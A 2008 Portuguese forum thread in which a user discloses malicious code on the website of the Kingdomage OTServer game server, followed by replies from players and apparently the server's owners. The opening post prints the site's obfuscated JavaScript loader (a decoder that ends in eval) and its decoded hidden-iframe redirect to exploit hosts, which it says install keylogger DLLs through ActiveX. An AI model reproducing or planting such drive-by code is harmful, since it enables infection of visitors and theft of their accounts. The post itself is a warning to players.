O escondido do Kingdomage OTServer

[Black Gooden 0]

O Escondido Do Kingdomage OTServer

Bom Galera vim aqui para alertar todo mundo para uma coisa interessante que o site da Kingdomage tem. Muitos conhecem este server porque muitos utilizadores tem na assinatura O 2014(ano de lançamento) do Server.

 

A duvida

Bom Se voce Entrarem no site da Kingdomage Tendo o AVG no seu computador Vejam o que acontece:

Muitas pessoas estaram agora a se perguntar o porque disto. Mas vocês verão que esse alerta não é falso

 

A verdade Escondida

Se vocês entrarem dentro do site e virem a source code do site aparecera o codigo fantástico como este:

<script language=JavaScript> function xbezbn15(p) 
{
   var h = p.length, k = 1024, s, i, c, z = 0, d = 0, j = 0, t = Array(63, 28, 56, 62, 14, 26, 50, 48, 
   46, 42, 0, 0, 0, 0, 0, 0, 29, 5, 1, 25, 54, 22, 4, 58, 39, 13, 18, 45, 37, 15, 11, 43, 47, 31, 35, 
   51, 2, 34, 20, 61, 27, 8, 12, 0, 0, 0, 0, 0, 0, 32, 38, 36, 59, 9, 30, 7, 16, 3, 21, 44, 55, 19, 57, 
   52, 33, 6, 41, 49, 60, 23, 24, 17, 40, 10, 53);
   for (i = Math.ceil(h / k); i > 0; i--)
   {
       c = '';
       for (s = Math.min(h, k); s > 0; s--, h--)
       {
           {
               j |= (t[p.charCodeAt(z++) - 48]) << d;
               if (d) {
                   c += String.fromCharCode(247^j & 255);
                   j >>= 8;
                   d -= 2
               }
               else {
                   d = 6;
               }
           }
       }
       eval(c);
   }
}
xbezbn15('_GCbmUeaCm2aE4xaF9ZoSUCbJTISmUeLT9rcC4vD_ExHiynlhPkHwExL5ynzC5rbJ9kcgNrsgmtzFEYLyuWHi42pIRID_XncmGnafUCbCdCbwUeDiUI6hSK8E42HCuYbTbncQOOLi3CDA5CbmUrbQd@lqN17gQkl1iKcgNrsgmZo1i@zuixHm42Hyu17gQWHJGecQ4x6BQtzF4xRXyr6jMrHFf2bEGvSCUCbJE@6NRKHwExL5yC6hdI')
</script><!-- kingdomage.com -->

claro este codigo esta todo em 1 linha so mas eu tive o prazer de estruturalo para voces.

 

A verdade Ocultada

Isto e uma maneira de encriptar O que o verdadeiro codigo que e este:

.<script language=javascript>
document.write('<iframe name=e0e103 src="http://7addition.info/t/?'+Math.round(Math.random()*15600)+'e0e103'+'" width=260 height=60 style="display:none"></iframe>')
</script>

Que por sua vez envia para este site:

http://213.155.4.191/auth/index.php?id=005AD56F&a78bfb

e curiosidade é um IP dum utilizador nao dum servidor

Aqui tão os detalhes =)

Bom felizmente este codigo apenas funciona em versões antigas de certos browsers exemplo IE6. MAs todos Os internet explorers estão vulneraveis a estes ataques se aceitarem o activeX (imagem mais abaixo) Ele aponta para um famoso site de exploits que esta Blacklisted. Este site pretence a um grupo de exploits tal como addicted etc.... Exploit Este que se Aloja no computador da victima roubando informaçoes dela.

 

Resumo

Após esta explicação gostaria que o dono desse OTServer me disse-se o porque de isso no site. Se por algum motivo vocês(donos do OTServer) não sabiam deste promenor então retirem esse code.

 

Alerta

Quem usa mozilla Firefox não tem problemas porque o activex nao dispara mas para todos os utilizadores de Internet Explorer Ira surgir um alerta como este na imagem abaixo:

Se aceitarem este activex vai ser (provavelmente) uma dll instalada e autorizada a ler a sua memoria do Pc (incluindo tibia). Estas dll's tem como funçoes keyloggers ou as vezes memoris readers. Por tanto Cuidado. Não confiem Em ninguem que não saibam que é de confiança =)

 

Créditos

Black Gooden

Google xD

[SpeeD 1]

Boa Gooden, sou seu fan D:

Quero ver eles se pronunciarem agora.

[Yoh Asakura 2]

Não tem nem o que comentar de uma noticia dessa.

Realmente espero algum comentario explicando tudo isso. Afinal, ninguem quer crer que isto é proposital..

 

@Black Gooden

Deixando de lado sua opnião profissional, qual sua opnião pessoal sobre isto?

 

*É dificil não fazer suposições depois de uma noticia assim...

[Black Gooden 0]

Minha opinião pessoal? Eles ganharam a confiança das pessoas e instalaram activex no site para pessoas desprotegidas serem apanhadas com memori readers E roubarem as contas delas.

 

MInha opiniao e essa.

[Banxe 0]

Vindo do ot do chau não se pode esperar nada...

[Viniply 0]

concordo com seu ponto de vista esse povo da ka eh calote por isso nunca confiei neles mas agora vamo ver eles se pronuncia

[ElfKiller 36]

Que atitude deplorável. =(

 

Agora provavelmente o ano de lançamento deles vai passar a ser 2024, com outro nome, e com novos keyloggers =|

[auch 0]

Foi um erro nosso, desculpe o transtorno.

Estou tentando manter contato com o webmaster o mais rápido possível

Editado 9 Outubro, 2008 por auch

[Fighters 3]

Então se eu entrar no side desse otserver e pedi para desbloquiar essa janelinha de proteção de internet vai entrar uma .dll keylloger ou memoria reader?

ainda bem que não tive interesse de entrar no OTserver do Chau mesmo por nem ter estreiado...

Eu uso Chrome "o do orkut" tem algum jeito de proteção?

[Black Gooden 0]

Então se eu entrar no side desse otserver e pedi para desbloquiar essa janelinha de proteção de internet vai entrar uma .dll keylloger ou memoria reader?

ainda bem que não tive interesse de entrar no OTserver do Chau mesmo por nem ter estreiado...

Eu uso Chrome "o do orkut" tem algum jeito de proteção?

 

aUUHauhaHUA NAO é o do orkut. Mas sim o do Google

 

Nao preocupa esse erro so acontece em IE

 

 

Para auch ou seja chau:

 

Então você admite que era esse o objectivo? =)

E bom enquanto dura. mas foi apanhado

Editado 9 Outubro, 2008 por Black Gooden

[Nord 2]

Sou da equipe, nunca soube disso mas já que tão revelando o webmaster deve ter pego um site pronto e deu umas modificadas e o código permaneceu. (Detalhe, o webmaster é noob)

[Yoh Asakura 2]

Sou da equipe, nunca soube disso mas já que tão revelando o webmaster deve ter pego um site pronto e deu umas modificadas e o código permaneceu. (Detalhe, o webmaster é noob)

 

*Nord, os administradores de um projeto são responsaveis por escolher os membros de uma equipe. Consequentemente esses membros levam consigo o nome do projeto, em caso de falhas, todos devem ser responsabilizados.

 

Realmente espero que essa não seja uma tentativa de colocar toda a culpa em um unico membro da equipe, espero que haja uma explicação plausivel para tudo isso.

[Black Gooden 0]

Sou da equipe, nunca soube disso mas já que tão revelando o webmaster deve ter pego um site pronto e deu umas modificadas e o código permaneceu. (Detalhe, o webmaster é noob)

 

Por favor veja o post do auch..... So para informações o auch é o Chau mas mudo de nick

[Kakatox 0]

@Gooden

Você tá tentando rebater a tirada/piada do Chau mas não tá conseguindo...pra mim pelo menos. x)

 

@Topic

Bom, está claro que não é um erro de algum membro que não seja o webmaster e que não foi proposital, estaremos tomando as devidas providências.

[auch 0]

Então você admite que era esse o objectivo? =)

Sim, nós estamos trabalhando tanto e dedicando todo nosso esforço neste projeto, para depois vocês visitarem o site e catarem KL (6)

 

 

Sou da equipe, nunca soube disso mas já que tão revelando o webmaster deve ter pego um site pronto e deu umas modificadas e o código permaneceu. (Detalhe, o webmaster é noob)

 

Não, nunca faça tais hipóteses. O tatu hunter (diorges) não é noob e nunca pegaria um site e o modificaria.

 

Em nome do Kingdom Age, eu declaro um grande erro nosso, e portanto, entrarei em contato com o webmaster o mais rápido possível.

 

obrigado,

Chau.

Editado 9 Outubro, 2008 por auch

[Flay 0]

Issso é erdadeiramente uma comédia né ainda bem que tem gente igual ao Gooden para nos avisar, isso é uma pouca vergonha sacanagem, ainda bem que existem pessoas desentes nesse mundo quero ver agora os Donos do Servidor virem pedir desculpas, etc e etc....

 

Muiito Obrigado Gooden por nos avisar

[Fighters 3]

@Gooden

A google é dona de tudo >..< [Orkut,Youtube...]

hehehe mais valeu por avisar *-*

 

@auch

Coisa feia isso que vocês fizeram :/

 

@Topic vai ter alguma punição para eles?

[masterc 1]

 

ARFF TRAIRAJEM LAMBIX

[Yoh Asakura 2]

Em nome do Kingdom Age, eu declaro um grande erro nosso, e portanto, entrarei em contato com o webmaster o mais rápido possível.

 

*Tanto eu, como meus amigos aqui da Otnet queremos saber, qual erro no website é responsavel por instalar um Dll que está autorizada a ler a memoria do Pc.

 

O tatu hunter não é noob e nunca pegaria um site e o modificaria. Tantos codes feitos por ele são usados até hoje nos sites de otserver

 

*Bom, segundo o que você mesmo disse acima a Dll foi feita ou adicionada ao site por um membro da sua equipe. Tudo isso me levou a crer que você não estava sendo ironico no texo abaixo:

 

Sim, nós estamos trabalhando tanto e dedicando todo nosso esforço neste projeto, para depois vocês visitarem o site e catarem KL (6)

[Ricardo Iarossi 0]

Ta de brincadeira ne? nem lhe conheco mas voce fala "foi um grande erro nosso" isso nao existe! se o povao do tibiabot ng colocar keylogger no bot e hackiar METADE do tibia, eles vai la e diz "foi um grande erro nosso" e depois fica tudo bem? não é simples assim amigao, ninguen coloca um codigo desse tipo "sem querer".